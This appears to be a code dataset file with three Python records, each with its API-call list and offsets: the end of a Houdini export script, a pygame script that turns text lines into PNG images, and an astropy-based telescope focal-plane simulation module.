wizard_export.export(stage_name='modeling', export_name=export_name, out_node=out_node_name)
except:
logger.error(str(traceback.format_exc()))
finally:
wizard_export.reopen(scene)
|
[
"houdini_wizard.wizard_export.save_or_save_increment",
"houdini_wizard.wizard_export.reopen",
"houdini_wizard.wizard_tools.check_out_node_existence",
"houdini_wizard.wizard_export.trigger_before_export_hook",
"traceback.format_exc",
"houdini_wizard.wizard_export.export",
"logging.getLogger"
] |
[((121, 148), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (138, 148), False, 'import logging\n'), ((293, 331), 'houdini_wizard.wizard_export.save_or_save_increment', 'wizard_export.save_or_save_increment', ([], {}), '()\n', (329, 331), False, 'from houdini_wizard import wizard_export\n'), ((960, 987), 'houdini_wizard.wizard_export.reopen', 'wizard_export.reopen', (['scene'], {}), '(scene)\n', (980, 987), False, 'from houdini_wizard import wizard_export\n'), ((586, 638), 'houdini_wizard.wizard_tools.check_out_node_existence', 'wizard_tools.check_out_node_existence', (['out_node_name'], {}), '(out_node_name)\n', (623, 638), False, 'from houdini_wizard import wizard_tools\n'), ((715, 767), 'houdini_wizard.wizard_export.trigger_before_export_hook', 'wizard_export.trigger_before_export_hook', (['"""modeling"""'], {}), "('modeling')\n", (755, 767), False, 'from houdini_wizard import wizard_export\n'), ((784, 880), 'houdini_wizard.wizard_export.export', 'wizard_export.export', ([], {'stage_name': '"""modeling"""', 'export_name': 'export_name', 'out_node': 'out_node_name'}), "(stage_name='modeling', export_name=export_name,\n out_node=out_node_name)\n", (804, 880), False, 'from houdini_wizard import wizard_export\n'), ((914, 936), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (934, 936), False, 'import traceback\n')]
|
#! /usr/bin/python
# -*- coding: utf-8 -*-
'''
# Convert the PNGs to GIFs with convert (ImageMagick):
ls |sed 's/\(.*\).png/convert \1.png -flatten -channel A -threshold 0% \1.gif/g'
# Package with cx-Freeze:
Python setup.py build
Python setup.py bdist_msi
'''
from os import mkdir
from os import walk
from os import path
from os import getcwd
import sys
from math import floor
from codecs import open
# from pathlib import Path
# from inspect import getsourcefile
# from os.path import abspath
import pygame
def AAfilledRoundedRect(surface,rect,color,radius=0.4):
"""
AAfilledRoundedRect(surface,rect,color,radius=0.4)
surface : destination
rect : rectangle
color : rgb or rgba
radius : 0 <= radius <= 1
"""
rect = pygame.Rect(rect)
color = pygame.Color(*color)
alpha = color.a
color.a = 0
pos = rect.topleft
rect.topleft = 0,0
rectangle = pygame.Surface(rect.size,pygame.SRCALPHA)
circle = pygame.Surface([min(rect.size)*3]*2,pygame.SRCALPHA)
pygame.draw.ellipse(circle,(0,0,0),circle.get_rect(),0)
circle = pygame.transform.smoothscale(circle,[int(min(rect.size)*radius)]*2)
radius = rectangle.blit(circle,(0,0))
radius.bottomright = rect.bottomright
rectangle.blit(circle,radius)
radius.topright = rect.topright
rectangle.blit(circle,radius)
radius.bottomleft = rect.bottomleft
rectangle.blit(circle,radius)
rectangle.fill((0,0,0),rect.inflate(-radius.w,0))
rectangle.fill((0,0,0),rect.inflate(0,-radius.h))
rectangle.fill(color,special_flags=pygame.BLEND_RGBA_MAX)
rectangle.fill((255,255,255,alpha),special_flags=pygame.BLEND_RGBA_MIN)
return surface.blit(rectangle,pos)
def splitByLen(string, width):
return [string[x:x+width] for x in range(0, len(string), width)]
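# e.g. splitByLen(u'abcdefg', 3) -> ['abc', 'def', 'g']; used below to wrap long lines at line_len characters.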
def generate_pic(hasBackgroud, frontColor):
# import os.path
# try:
# dir_path = os.path.dirname(os.path.abspath(__file__))
# except NameError: # We are the main py2exe script, not a module
# import sys
# dir_path = os.path.dirname(os.path.abspath(sys.argv[0]))
# dir_path = path.dirname(path.realpath(__file__))
# dir_path = Path(__file__).parent
# dir_path = abspath(getsourcefile(lambda:0))
# if getattr(sys, 'text2img', False):
# # The application is frozen
# dir_path = path.dirname(sys.executable)
# Print("found install path:" + dir_path)
path_prefix = getcwd()
pygame.init()
fontPath = path.join(path_prefix, "fonts\\")
text = u'获取测试文本长度哈哈'
line_len = len(text)
fontSize = 15
    fontHeight = 200 # 35 40 50 # height of a single character; larger values give sharper glyphs
    fontEdge = 0.25 # image margin (as a fraction of fontHeight)
    picEdge = 1600 # 240 # image edge length; characters per line = picEdge/fontHeight
dst_scale = 240/picEdge
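    # dst_scale maps the full-resolution render (picEdge px wide) down to 240 px for the "big" output images below.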
width_plus = fontHeight * fontEdge
height_plus = fontHeight * fontEdge
radius_default = 0.5
color_white = (255, 255, 255, 255)
color_gray = (204, 204, 204, 255)
color_black = (0, 0, 0, 0)
isSmoooth = True
if hasBackgroud:
color_bg = color_gray
color_fg = frontColor
image_bg = "-bg"
else:
color_bg = None
color_fg = color_black
image_bg = ""
imagePath = path.join(path_prefix, "images\\")
Print(u"图片将生成在目录:\t\t\t\t\t" + imagePath)
mkdir(imagePath) if not path.exists(imagePath) else None
input_file = path.join(path_prefix,"1.txt")
if not path.exists(input_file):
Print(u"[退出]当前目录无文件:\t\t\t\t" + input_file)
return
else:
Print(u"以文件内容为输入:\t\t\t\t\t" + input_file)
if not path.exists(fontPath):
Print(u"[退出]未找到字体:\t\t\t\t\t" + fontPath)
return
else:
Print(u"搜索字体:\t\t\t\t\t\t\t" + fontPath)
for _,_,filenames in walk(path.join(fontPath)):
fontCount = 0
for filename in filenames:
font = pygame.font.Font(path.join("fonts", filename), fontSize)
_rtext = font.render(text, isSmoooth, color_fg, color_bg)
_width, _height = _rtext.get_size()
while _height < fontHeight:
fontSize += 1
font = pygame.font.Font(path.join("fonts", filename), fontSize)
_rtext = font.render(text, isSmoooth, color_fg, color_bg)
_width, _height = _rtext.get_size()
if hasBackgroud:
echoBG= u"带"
else:
echoBG= u"无"
Print(u"使用["+ str(fontSize).zfill(3) + "]号字体" + echoBG + "背景色:\t\t\t" + path.join(fontPath, filename))
fontCount += 1
width_one = _width/len(text)
line_len = floor(picEdge/(width_one+2*fontEdge))
imagePath_font = imagePath + path.splitext(filename)[0]
imagePath_big = imagePath_font + "\\big" + image_bg
imagePath_small = imagePath_font + "\\small" + image_bg
imagePath_huge = imagePath_font + "\\huge" + image_bg
mkdir(imagePath_font) if not path.exists(imagePath_font) else None
mkdir(imagePath_huge) if not path.exists(imagePath_huge) else None
mkdir(imagePath_big) if not path.exists(imagePath_big) else None
mkdir(imagePath_small) if not path.exists(imagePath_small) else None
Print(u"将生成最大[" + str(picEdge) + "]pix的图片:\t\t\t" + imagePath_huge)
Print(u"将生成[" + str(picEdge*dst_scale) + "x" + str(picEdge*dst_scale) + "]pix的微信图片:\t" + imagePath_big)
Print(u"将生成[" + str(picEdge*dst_scale/2) + "x" + str(picEdge*dst_scale/2) + "]pix的微信图片:\t" + imagePath_small)
count = 0
for line in open(input_file, mode='r', encoding='utf-8'):
line = line.strip("\n")
if len(line) == 0:
continue
lines = [line]
if len(line) > line_len:
lines = splitByLen(line, line_len)
rtext1 = pygame.Surface((width_one * len(lines[0]) + width_plus * 2, _height * len(lines) + height_plus * 2), pygame.SRCALPHA)
rtext1.set_alpha(0)
if hasBackgroud:
AAfilledRoundedRect(rtext1, rtext1.get_rect(), color_bg, 0.5)
line_count = 0
for every in lines:
rtext = font.render(every, isSmoooth, color_fg, color_bg)
rtext1.blit(rtext, (height_plus, width_plus + line_count * _height))
line_count += 1
pygame.image.save(rtext1, imagePath_huge + "\\" + str(count).zfill(2) + ".png")
Print(u"保存图片:\t\t\t\t\t\t\t" + imagePath_huge + "\\" + str(count).zfill(2) + ".png")
width_save = floor(picEdge*dst_scale)
height_save = floor(picEdge*dst_scale*rtext1.get_height()/rtext1.get_width())
rtext2 = pygame.transform.smoothscale(rtext1, (width_save, height_save))
rtext3 = pygame.Surface((picEdge*dst_scale, picEdge*dst_scale), pygame.SRCALPHA)
rtext3.set_alpha(0)
rtext3.blit(rtext2, (0, (picEdge*dst_scale - rtext2.get_height())/2))
pygame.image.save(rtext3, imagePath_big + "\\" + str(count).zfill(2) + ".png")
Print(u"保存图片:\t\t\t\t\t\t\t" + imagePath_big + "\\" + str(count).zfill(2) + ".png")
rtext2 = pygame.transform.smoothscale(rtext3, (floor(rtext3.get_width()/2), floor(rtext3.get_height()/2)))
pygame.image.save(rtext2, imagePath_small + "\\" + str(count).zfill(2) + ".png")
Print(u"保存图片:\t\t\t\t\t\t\t" + imagePath_small + "\\" + str(count).zfill(2) + ".png")
count += 1
__DEBUG__ = True
def Print(string):
print(string) if __DEBUG__ else None
generate_pic(True, (0, 0, 0, 0))
generate_pic(False, (0, 0, 0, 0))
|
[
"os.mkdir",
"pygame.Surface",
"codecs.open",
"pygame.transform.smoothscale",
"os.getcwd",
"pygame.Rect",
"pygame.Color",
"os.path.exists",
"pygame.init",
"math.floor",
"os.path.splitext",
"os.path.join"
] |
[((747, 764), 'pygame.Rect', 'pygame.Rect', (['rect'], {}), '(rect)\n', (758, 764), False, 'import pygame\n'), ((784, 804), 'pygame.Color', 'pygame.Color', (['*color'], {}), '(*color)\n', (796, 804), False, 'import pygame\n'), ((927, 969), 'pygame.Surface', 'pygame.Surface', (['rect.size', 'pygame.SRCALPHA'], {}), '(rect.size, pygame.SRCALPHA)\n', (941, 969), False, 'import pygame\n'), ((2527, 2535), 'os.getcwd', 'getcwd', ([], {}), '()\n', (2533, 2535), False, 'from os import getcwd\n'), ((2540, 2553), 'pygame.init', 'pygame.init', ([], {}), '()\n', (2551, 2553), False, 'import pygame\n'), ((2569, 2602), 'os.path.join', 'path.join', (['path_prefix', '"""fonts\\\\"""'], {}), "(path_prefix, 'fonts\\\\')\n", (2578, 2602), False, 'from os import path\n'), ((3307, 3341), 'os.path.join', 'path.join', (['path_prefix', '"""images\\\\"""'], {}), "(path_prefix, 'images\\\\')\n", (3316, 3341), False, 'from os import path\n'), ((3466, 3497), 'os.path.join', 'path.join', (['path_prefix', '"""1.txt"""'], {}), "(path_prefix, '1.txt')\n", (3475, 3497), False, 'from os import path\n'), ((3392, 3408), 'os.mkdir', 'mkdir', (['imagePath'], {}), '(imagePath)\n', (3397, 3408), False, 'from os import mkdir\n'), ((3508, 3531), 'os.path.exists', 'path.exists', (['input_file'], {}), '(input_file)\n', (3519, 3531), False, 'from os import path\n'), ((3672, 3693), 'os.path.exists', 'path.exists', (['fontPath'], {}), '(fontPath)\n', (3683, 3693), False, 'from os import path\n'), ((3849, 3868), 'os.path.join', 'path.join', (['fontPath'], {}), '(fontPath)\n', (3858, 3868), False, 'from os import path\n'), ((3416, 3438), 'os.path.exists', 'path.exists', (['imagePath'], {}), '(imagePath)\n', (3427, 3438), False, 'from os import path\n'), ((4709, 4752), 'math.floor', 'floor', (['(picEdge / (width_one + 2 * fontEdge))'], {}), '(picEdge / (width_one + 2 * fontEdge))\n', (4714, 4752), False, 'from math import floor\n'), ((5696, 5740), 'codecs.open', 'open', (['input_file'], {'mode': '"""r"""', 'encoding': '"""utf-8"""'}), "(input_file, mode='r', encoding='utf-8')\n", (5700, 5740), False, 'from codecs import open\n'), ((3964, 3992), 'os.path.join', 'path.join', (['"""fonts"""', 'filename'], {}), "('fonts', filename)\n", (3973, 3992), False, 'from os import path\n'), ((5025, 5046), 'os.mkdir', 'mkdir', (['imagePath_font'], {}), '(imagePath_font)\n', (5030, 5046), False, 'from os import mkdir\n'), ((5104, 5125), 'os.mkdir', 'mkdir', (['imagePath_huge'], {}), '(imagePath_huge)\n', (5109, 5125), False, 'from os import mkdir\n'), ((5183, 5203), 'os.mkdir', 'mkdir', (['imagePath_big'], {}), '(imagePath_big)\n', (5188, 5203), False, 'from os import mkdir\n'), ((5260, 5282), 'os.mkdir', 'mkdir', (['imagePath_small'], {}), '(imagePath_small)\n', (5265, 5282), False, 'from os import mkdir\n'), ((6763, 6789), 'math.floor', 'floor', (['(picEdge * dst_scale)'], {}), '(picEdge * dst_scale)\n', (6768, 6789), False, 'from math import floor\n'), ((6907, 6970), 'pygame.transform.smoothscale', 'pygame.transform.smoothscale', (['rtext1', '(width_save, height_save)'], {}), '(rtext1, (width_save, height_save))\n', (6935, 6970), False, 'import pygame\n'), ((6996, 7071), 'pygame.Surface', 'pygame.Surface', (['(picEdge * dst_scale, picEdge * dst_scale)', 'pygame.SRCALPHA'], {}), '((picEdge * dst_scale, picEdge * dst_scale), pygame.SRCALPHA)\n', (7010, 7071), False, 'import pygame\n'), ((4232, 4260), 'os.path.join', 'path.join', (['"""fonts"""', 'filename'], {}), "('fonts', filename)\n", (4241, 4260), False, 'from os import path\n'), ((4603, 4632), 
'os.path.join', 'path.join', (['fontPath', 'filename'], {}), '(fontPath, filename)\n', (4612, 4632), False, 'from os import path\n'), ((4788, 4811), 'os.path.splitext', 'path.splitext', (['filename'], {}), '(filename)\n', (4801, 4811), False, 'from os import path\n'), ((5054, 5081), 'os.path.exists', 'path.exists', (['imagePath_font'], {}), '(imagePath_font)\n', (5065, 5081), False, 'from os import path\n'), ((5133, 5160), 'os.path.exists', 'path.exists', (['imagePath_huge'], {}), '(imagePath_huge)\n', (5144, 5160), False, 'from os import path\n'), ((5211, 5237), 'os.path.exists', 'path.exists', (['imagePath_big'], {}), '(imagePath_big)\n', (5222, 5237), False, 'from os import path\n'), ((5290, 5318), 'os.path.exists', 'path.exists', (['imagePath_small'], {}), '(imagePath_small)\n', (5301, 5318), False, 'from os import path\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from dataclasses import dataclass, field
from typing import Callable, List
from astropy.coordinates import SkyCoord, Longitude, Latitude, Angle
from astropy.time import Time
from astropy.units.quantity import Quantity
from astropy.wcs import WCS
from astropy.visualization.wcsaxes import WCSAxesSubplot
from scipy.spatial.transform import Rotation
from matplotlib.patches import Rectangle
from shapely.geometry import Polygon, Point
from shapely.geometry import MultiPoint
from shapely.prepared import prep
from descartes.patch import PolygonPatch
from scipy.optimize import least_squares
import matplotlib.pyplot as plt
import astropy.units as u
import numpy as np
import pandas as pd
import sys
from .util import get_projection
def identity_transformation(position):
''' An identity transformation function.
  This function is a fallback for the image distortion.
The function requires a tuple of two arrays. The first and second elements
are the x- and y-positions on the focal plane without any distortion,
respectively. This function returns the positions as they are.
Parameters:
position: A numpy.array with the shape of (2, Nsrc). The first element
contains the x-positions, while the second element contains
the y-positions.
Return:
A numpy.ndarray of the input coordinates.
'''
return np.array(position)
@dataclass
class Optics(object):
''' Definition of optical components.
Attributes:
    pointing (SkyCoord) : the direction of the telescope pointing.
position_angle (Angle) : the position angle of the telescope.
focal_length (Quantity): the focal length of the telescope in meter.
diameter (Quantity) : the diameter of the telescope in meter.
valid_region (Polygon) : the valid region of the focal plane.
    margin (Quantity) : the margin of the valid region (buffer).
distortion (function) : a function to distort the focal plane image.
'''
pointing: SkyCoord
position_angle: Angle = Angle(0.0, unit='degree')
focal_length: Quantity = 7.3*u.m
diameter: Quantity = 0.4*u.m
valid_region: Polygon = Point(0,0).buffer(30000)
margin: Quantity = 5000*u.um
distortion: Callable = identity_transformation
@property
def scale(self):
''' A conversion factor from sky to focal plane in degree/um. '''
return (1.0*u.rad/self.focal_length).to(u.deg/u.um)
@property
def center(self):
    ''' A dummy position to define the center of the focal plane. '''
return SkyCoord(0*u.deg,0*u.deg,frame='icrs')
@property
def pointing_angle(self):
''' Angle set to define the pointing position and orientation. '''
## use the ICRS frame in calculation.
icrs = self.pointing.icrs
## calculate position angle in the ICRS frame.
north = self.pointing.directional_offset_by(0.0,1*u.arcsec)
delta = self.pointing.icrs.position_angle(north)
position_angle = -self.position_angle.rad-delta.rad
return np.array((icrs.ra.rad,-icrs.dec.rad,position_angle))
def set_distortion(self, distortion):
''' Assign a distortion function.
The argument of the distortion function should be a numpy.array with
the shape of (2, Nsrc). The first element contains the x-positions,
while the second element contains the y-positions.
Parameters:
distortion (function): a function to distort focal plane image.
'''
self.distortion = distortion
def block(self, position):
''' Block sources by a certain radius.
Parameters:
position (ndarray): source positions on the focal plane w/o distortion.
Return:
A boolean array to indicate which sources are inside the field-of-view.
'''
mp = MultiPoint(position.T)
polygon = prep(self.valid_region.buffer(self.margin.to_value(u.um)))
return np.array([not polygon.contains(p) for p in mp.geoms])
def imaging(self, sources, epoch=None):
''' Map celestial positions onto the focal plane.
Parameters:
sources (SkyCoord): the coordinates of sources.
epoch (Time): the epoch of the observation.
Return:
A `DataFrame` instance. The DataFrame contains four columns: the "x" and
"y" columns are the positions on the focal plane in micron, and the "ra"
and "dec" columns are the original celestial positions in the ICRS frame.
'''
try:
if epoch is not None:
sources = sources.apply_space_motion(epoch)
except Exception as e:
print('No proper motion information is available.', file=sys.stderr)
print('The positions are not updated to new epoch.', file=sys.stderr)
icrs = sources.transform_to('icrs')
xyz = icrs.cartesian.xyz
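    # Rotate the celestial sphere so that the pointing direction is mapped to (ra, dec) = (0, 0), matching self.center, and the field is de-rotated by the position angle.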
r = Rotation.from_euler('zyx', -self.pointing_angle)
pqr = r.as_matrix() @ xyz
if pqr.ndim==1: pqr = np.expand_dims(pqr,axis=1)
obj = SkyCoord(pqr.T, obstime=epoch,
representation_type='cartesian').transform_to('icrs')
obj.representation_type = 'spherical'
proj = get_projection(self.center,self.scale.to_value())
pos = np.array(obj.to_pixel(proj, origin=0))
blocked = self.block(pos)
pos = self.distortion(pos)
return pd.DataFrame({
'x': pos[0], 'y': pos[1],
'ra': icrs.ra, 'dec': icrs.dec,
'blocked': blocked
})
@dataclass
class PixelDisplacement(object):
''' Definition of the pixel non-uniformity.
Attributes:
dx (ndarray): a two dimensional array with the same size of the detector.
each element contains the x-displacement of the pixel.
dy (ndarray): a two dimensional array with the same size of the detector.
each element contains the y-displacement of the pixel.
'''
dx: np.ndarray = None
dy: np.ndarray = None
def initialize(self, naxis1, naxis2):
''' Initialize the displacement array with zeros.
Parameters:
naxis1 (int): the detector size along with NAXIS1.
naxis2 (int): the detector size along with NAXIS2.
'''
self.dx = np.zeros((naxis2, naxis1))
self.dy = np.zeros((naxis2, naxis1))
def evaluate(self, x, y):
''' Evaluate the source position displacement.
Parameters:
position (ndarray): a numpy.ndarray with the shape of (2, N(sources)).
the first array contains the x-coordinates, while
the second does the y-coordinates.
Note:
Not implemented yet.
'''
return (x,y)
@dataclass
class Detector(object):
''' Definition of a detector.
Attributes:
naxis1 (int) : detector pixels along with NAXIS1.
naxis2 (int) : detector pixels along with NAXIS2.
pixel_scale (Quantity): nominal detector pixel scale.
    offset_dx (Quantity) : the offset along the x-axis.
    offset_dy (Quantity) : the offset along the y-axis.
position_angle (Angle): the position angle of the detector.
displacement (PixelDisplacement):
an instance to define the displacements of the sources due to
the pixel non-uniformity.
'''
naxis1: int = 4096
naxis2: int = 4096
pixel_scale: Quantity = 10*u.um
offset_dx: Quantity = 0*u.um
offset_dy: Quantity = 0*u.um
position_angle: Angle = Angle(0.0, unit='degree')
displacement: PixelDisplacement = None
def __post_init__(self):
if self.displacement is None:
self.displacement = PixelDisplacement()
self.displacement.initialize(self.naxis1,self.naxis2)
@property
def width(self):
''' The physical width of the detector. '''
return self.naxis1*self.pixel_scale.to_value(u.um)
@property
def height(self):
''' The physical height of the detector. '''
return self.naxis2*self.pixel_scale.to_value(u.um)
@property
def xrange(self):
''' The x-axis range of the detector. '''
return np.array((-self.width/2,self.width/2))
@property
def yrange(self):
''' The y-axis range of the detector. '''
return np.array((-self.height/2,self.height/2))
@property
def patch(self):
''' The footprint of the detector on the focal plane as a patch. '''
c,s = np.cos(self.position_angle.rad),np.sin(self.position_angle.rad)
x0,y0 = self.offset_dx.to_value(u.um),self.offset_dy.to_value(u.um)
x1 = x0 - (+ self.width*c - self.height*s)/2
y1 = y0 - (+ self.width*s + self.height*c)/2
return Rectangle((x1,y1), width=self.width, height=self.height,
angle=self.position_angle.deg, ec='r', linewidth=2, fill=False)
@property
def footprint(self):
''' The footprint of the detector on the focal plane. '''
c,s = np.cos(self.position_angle.rad),np.sin(self.position_angle.rad)
x0,y0 = self.offset_dx.to_value(u.um),self.offset_dy.to_value(u.um)
x1 = x0 - (+ self.width*c - self.height*s)/2
y1 = y0 - (+ self.width*s + self.height*c)/2
x2 = x0 - (- self.width*c - self.height*s)/2
y2 = y0 - (- self.width*s + self.height*c)/2
x3 = x0 - (- self.width*c + self.height*s)/2
y3 = y0 - (- self.width*s - self.height*c)/2
x4 = x0 - (+ self.width*c + self.height*s)/2
y4 = y0 - (+ self.width*s - self.height*c)/2
return Polygon(([x1,y1],[x2,y2],[x3,y3],[x4,y4]))
def align(self, x, y):
''' Align the source position to the detector.
Parameters:
x (Series): the x-coordinates on the focal plane.
y (Series): the y-coordinates on the focal plane.
Return:
The tuple of the x- and y-positions of the sources, which are remapped
onto the detector coordinates.
'''
c,s = np.cos(-self.position_angle.rad),np.sin(-self.position_angle.rad)
dx,dy = x-self.offset_dx.to_value(u.um), y-self.offset_dy.to_value(u.um)
return c*dx-s*dy, s*dx+c*dy
def capture(self, position):
''' Calculate the positions of the sources on the detector.
Parameters:
position (DataFrame): the positions of the sources on the focal plane.
the "x" and "y" columns are respectively the x-
and y-positions of the sources in units of micron.
Return:
A list of `DataFrame`s which contains the positions on the detectors.
The number of the `DataFrame`s are the same as the detectors.
The "x" and "y" columns are the positions on each detector. The "ra"
and "dec" columns are the original positions in the ICRS frame.
'''
x,y = self.align(position.x, position.y)
x,y = self.displacement.evaluate(x,y)
position.x = x
position.y = y
bf = ~position.blocked
xf = ((self.xrange[0] < x) & (x < self.xrange[1]))
yf = ((self.yrange[0] < y) & (y < self.yrange[1]))
return position.loc[xf&yf&bf,:]
@dataclass
class Telescope(object):
''' An imaginary telescope instance.
The `Telescope` class is composed of an `Optics` instance and a list of
`Detector` instances. This instance organizes the alignment of the detectors
and converts the coordinates of the astronomical sources into the positions
on the detectors.
Attributes:
pointing (SkyCoord)
position_angle (Angle):
'''
pointing: SkyCoord = None
position_angle: Angle = None
optics: Optics = None
detectors: List[Detector] = None
def __post_init__(self):
if self.optics is None:
self.optics = Optics(self.pointing, self.position_angle)
else:
self.pointing = self.optics.pointing
self.position_angle = self.optics.position_angle
if self.detectors is None:
self.detectors = [Detector(),]
assert self.optics is not None
assert self.detectors is not None
def set_distortion(self, distortion):
''' Set a distortion function to the optics.
Parameters:
distortion (function): a function to distort focal plane image.
'''
self.optics.set_distortion(distortion)
def get_footprints(self, **options):
''' Obtain detector footprints on the sky.
Options:
frame (string): specify the coordinate of the footprint.
limit (bool): limit the footprints within the valid region.
patch (bool): obtain PolygonPatch instead of Polygon.
'''
frame = options.pop('frame', self.pointing.frame.name)
limit = options.pop('limit', True)
patch = options.pop('patch', False)
if self.pointing.frame.name == 'galactic':
l0 = self.pointing.galactic.l
b0 = self.pointing.galactic.b
else:
l0 = self.pointing.icrs.ra
b0 = self.pointing.icrs.dec
def generate(e):
frame = self.pointing.frame
def func(x):
pos = x.reshape((-1,2))
p0 = SkyCoord(pos[:,0], pos[:,1], frame=frame, unit=u.deg)
res = self.optics.imaging(p0)
return (e-res[['x','y']].to_numpy()).flatten()
return func
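    # Each detector edge point (in focal-plane microns) is mapped back to sky coordinates by least-squares inversion of the imaging transform.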
footprints = []
valid_region = self.optics.valid_region
for d in self.detectors:
fp = valid_region.intersection(d.footprint) if limit else d.footprint
edge = np.array(fp.boundary.coords[0:-1])
p0 = np.tile([l0.deg,b0.deg],edge.shape[0])
func = generate(edge)
res = least_squares(func, p0)
pos = res.x.reshape((-1,2))
sky = SkyCoord(pos[:,0]*u.deg,pos[:,1]*u.deg,
frame=self.pointing.frame.name)
if frame == 'galactic':
sky = sky.galactic
pos = Polygon(np.stack([sky.l.deg,sky.b.deg]).T)
else:
sky = sky.icrs
pos = Polygon(np.stack([sky.ra.deg,sky.dec.deg]).T)
footprints.append(PolygonPatch(pos, **options) if patch else pos)
return footprints
def overlay_footprints(self, axis, **options):
''' Display the footprints on the given axis.
Parameters:
axis (WCSAxesSubplot):
An axis instance with a WCS projection.
Options:
      frame (string): the coordinate frame.
label (string): the label of the footprints.
color (Color): color of the footprint edges.
'''
label = options.pop('label', None)
color = options.pop('color','C2')
frame = options.pop('frame', self.pointing.frame.name)
if isinstance(axis, WCSAxesSubplot):
      options['transform'] = axis.get_transform(frame)
for footprint in self.get_footprints(frame=frame, **options):
v = np.array(footprint.boundary.coords)
axis.plot(v[:,0], v[:,1], c=color, label=label, **options)
return axis
def display_focal_plane(
self, sources=None, epoch=None, axis=None, **options):
''' Display the layout of the detectors.
Show the layout of the detectors on the focal plane. The detectors are
illustrated by the red rectangles. If the `sources` are provided, the
detectors are overlaid on the sources on the focal plane.
Parameters:
sources (SkyCoord): the coordinates of astronomical sources.
epoch (Time) : the observation epoch.
'''
markersize = options.pop('markersize', 1)
marker = options.pop('marker', 'x')
figsize = options.pop('figsize', (8,8))
    fig = None
    if axis is None:
      fig = plt.figure(figsize=figsize)
      axis = fig.add_subplot(111)
axis.set_aspect(1.0)
axis.add_patch(PolygonPatch(
self.optics.valid_region, color=(0.8,0.8,0.8), alpha=0.2))
if sources is not None:
position = self.optics.imaging(sources, epoch)
axis.scatter(position.x,position.y,markersize,marker=marker)
for d in self.detectors:
axis.add_patch(d.patch)
axis.autoscale_view()
axis.grid()
axis.set_xlabel('Displacement on the focal plane ($\mu$m)', fontsize=14)
axis.set_ylabel('Displacement on the focal plane ($\mu$m)', fontsize=14)
    if fig is not None: fig.tight_layout()
def observe(self, sources, epoch=None):
''' Observe astronomical sources.
Map the sky coordinates of astronomical sources into the physical
positions on the detectors of the telescope.
Parameters:
sources (SkyCoord): a list of astronomical sources.
epoch (Time): the datetime of the observation.
Return:
A numpy.ndarray with the shape of (N(detector), 2, N(source)).
The first index specifies the detector of the telescope.
A two dimensional array is assigned for each detector. The first
line is the coordinates along the NAXIS1 axis, and the second one
is the coordinates along the NAXIS2 axis.
'''
position = self.optics.imaging(sources, epoch)
fov = []
for det in self.detectors:
fov.append(det.capture(position))
return fov
|
[
"pandas.DataFrame",
"numpy.stack",
"shapely.geometry.Point",
"shapely.geometry.MultiPoint",
"descartes.patch.PolygonPatch",
"shapely.geometry.Polygon",
"matplotlib.patches.Rectangle",
"numpy.zeros",
"numpy.expand_dims",
"scipy.optimize.least_squares",
"matplotlib.pyplot.figure",
"numpy.sin",
"numpy.array",
"numpy.tile",
"numpy.cos",
"astropy.coordinates.Angle",
"astropy.coordinates.SkyCoord",
"scipy.spatial.transform.Rotation.from_euler"
] |
[((1409, 1427), 'numpy.array', 'np.array', (['position'], {}), '(position)\n', (1417, 1427), True, 'import numpy as np\n'), ((2059, 2084), 'astropy.coordinates.Angle', 'Angle', (['(0.0)'], {'unit': '"""degree"""'}), "(0.0, unit='degree')\n", (2064, 2084), False, 'from astropy.coordinates import SkyCoord, Longitude, Latitude, Angle\n'), ((7244, 7269), 'astropy.coordinates.Angle', 'Angle', (['(0.0)'], {'unit': '"""degree"""'}), "(0.0, unit='degree')\n", (7249, 7269), False, 'from astropy.coordinates import SkyCoord, Longitude, Latitude, Angle\n'), ((2568, 2612), 'astropy.coordinates.SkyCoord', 'SkyCoord', (['(0 * u.deg)', '(0 * u.deg)'], {'frame': '"""icrs"""'}), "(0 * u.deg, 0 * u.deg, frame='icrs')\n", (2576, 2612), False, 'from astropy.coordinates import SkyCoord, Longitude, Latitude, Angle\n'), ((3026, 3080), 'numpy.array', 'np.array', (['(icrs.ra.rad, -icrs.dec.rad, position_angle)'], {}), '((icrs.ra.rad, -icrs.dec.rad, position_angle))\n', (3034, 3080), True, 'import numpy as np\n'), ((3763, 3785), 'shapely.geometry.MultiPoint', 'MultiPoint', (['position.T'], {}), '(position.T)\n', (3773, 3785), False, 'from shapely.geometry import MultiPoint\n'), ((4745, 4793), 'scipy.spatial.transform.Rotation.from_euler', 'Rotation.from_euler', (['"""zyx"""', '(-self.pointing_angle)'], {}), "('zyx', -self.pointing_angle)\n", (4764, 4793), False, 'from scipy.spatial.transform import Rotation\n'), ((5209, 5305), 'pandas.DataFrame', 'pd.DataFrame', (["{'x': pos[0], 'y': pos[1], 'ra': icrs.ra, 'dec': icrs.dec, 'blocked': blocked}"], {}), "({'x': pos[0], 'y': pos[1], 'ra': icrs.ra, 'dec': icrs.dec,\n 'blocked': blocked})\n", (5221, 5305), True, 'import pandas as pd\n'), ((6038, 6064), 'numpy.zeros', 'np.zeros', (['(naxis2, naxis1)'], {}), '((naxis2, naxis1))\n', (6046, 6064), True, 'import numpy as np\n'), ((6079, 6105), 'numpy.zeros', 'np.zeros', (['(naxis2, naxis1)'], {}), '((naxis2, naxis1))\n', (6087, 6105), True, 'import numpy as np\n'), ((7839, 7882), 'numpy.array', 'np.array', (['(-self.width / 2, self.width / 2)'], {}), '((-self.width / 2, self.width / 2))\n', (7847, 7882), True, 'import numpy as np\n'), ((7967, 8012), 'numpy.array', 'np.array', (['(-self.height / 2, self.height / 2)'], {}), '((-self.height / 2, self.height / 2))\n', (7975, 8012), True, 'import numpy as np\n'), ((8367, 8493), 'matplotlib.patches.Rectangle', 'Rectangle', (['(x1, y1)'], {'width': 'self.width', 'height': 'self.height', 'angle': 'self.position_angle.deg', 'ec': '"""r"""', 'linewidth': '(2)', 'fill': '(False)'}), "((x1, y1), width=self.width, height=self.height, angle=self.\n position_angle.deg, ec='r', linewidth=2, fill=False)\n", (8376, 8493), False, 'from matplotlib.patches import Rectangle\n'), ((9142, 9191), 'shapely.geometry.Polygon', 'Polygon', (['([x1, y1], [x2, y2], [x3, y3], [x4, y4])'], {}), '(([x1, y1], [x2, y2], [x3, y3], [x4, y4]))\n', (9149, 9191), False, 'from shapely.geometry import Polygon, Point\n'), ((2182, 2193), 'shapely.geometry.Point', 'Point', (['(0)', '(0)'], {}), '(0, 0)\n', (2187, 2193), False, 'from shapely.geometry import Polygon, Point\n'), ((4850, 4877), 'numpy.expand_dims', 